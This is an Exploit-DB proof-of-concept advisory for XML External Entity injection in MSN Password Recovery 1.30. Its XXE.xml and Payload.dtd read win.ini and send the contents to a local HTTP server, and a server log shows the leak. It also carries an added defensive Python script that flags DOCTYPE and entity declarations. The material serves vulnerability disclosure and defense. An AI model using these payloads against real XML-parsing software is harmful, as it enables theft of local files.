MSN Password Recovery 1.30 – XML External Entity Injection

  • Author: ZwX
    Date: 2020-01-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47896/
  • # Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection
    # Exploit Author: ZwX
    # Exploit Date: 2020-01-08
    # Vendor Homepage : https://www.top-password.com/
    # Software Link: https://www.top-password.com/download/MSNPRSetup.exe
    # Tested on OS: Windows 10
    
    
    [+] Exploit : (PoC)
    ===================
    1) python -m SimpleHTTPServer 8000
    2) Create file (.xml)
    3) Create file Payload.dtd
    4) Open the software MSN Password Recovery
    5) Click the 'Help' button and a 'Msn Password Recovery' window opens
    6) Click the 'Favorites' tab and add the path of your .xml file in Path Current (e.g. file:///C:/Users/ZwX/Desktop/file.xml)
    7) Click the 'View' button
    8) External Entity Injection Successful
    
    
    [+] XXE.xml :
    ==============
    <?xml version="1.0"?>
    <!DOCTYPE test [
    <!ENTITY % file SYSTEM "C:\Windows\win.ini">
    <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
    %dtd;]>
    <pwn>&send;</pwn>
    
    [+] Payload.dtd :
    =================
    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
    %all;
    
    
    [+] Result Exploitation :
    =========================
    C:\>python -m SimpleHTTPServer 8000
    Serving HTTP on 0.0.0.0 port 8000 ...
    ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 -
    ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
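
A defender-side check for the XXE.xml pattern above, as an added example that is not part of the original advisory or the vendor's code: it uses Python's expat bindings to list the DOCTYPE and entity declarations in an XML file without resolving any of them, so a file can be rejected before a DTD-processing parser sees it. The names `audit_xml` and `is_safe_to_parse` and the benign sample are assumptions made for illustration.

```python
import xml.parsers.expat as expat

# Constructed sample: the XXE.xml shown in the advisory, embedded as raw bytes.
XXE_SAMPLE = rb"""<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""
# Constructed benign sample (hypothetical favourites file, no DTD).
BENIGN_SAMPLE = b"<?xml version='1.0'?><favorites><item>index.htm</item></favorites>"


def audit_xml(data):
    """Return a list of (kind, name, system_id) findings; nothing is fetched."""
    findings = []
    parser = expat.ParserCreate()
    # Parameter entity references such as %dtd; are never loaded.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is None and public_id is None:
            kind = "internal-entity"
        elif is_param:
            kind = "external-parameter-entity"
        else:
            kind = "external-general-entity"
        findings.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        findings.append(("malformed", str(exc), None))
    return findings


def is_safe_to_parse(data):
    """Accept only documents with no DOCTYPE, no entity declarations, no errors."""
    return not audit_xml(data)


if __name__ == "__main__":
    for kind, name, system_id in audit_xml(XXE_SAMPLE):
        print(f"{kind:28} {name:6} {system_id}")
```
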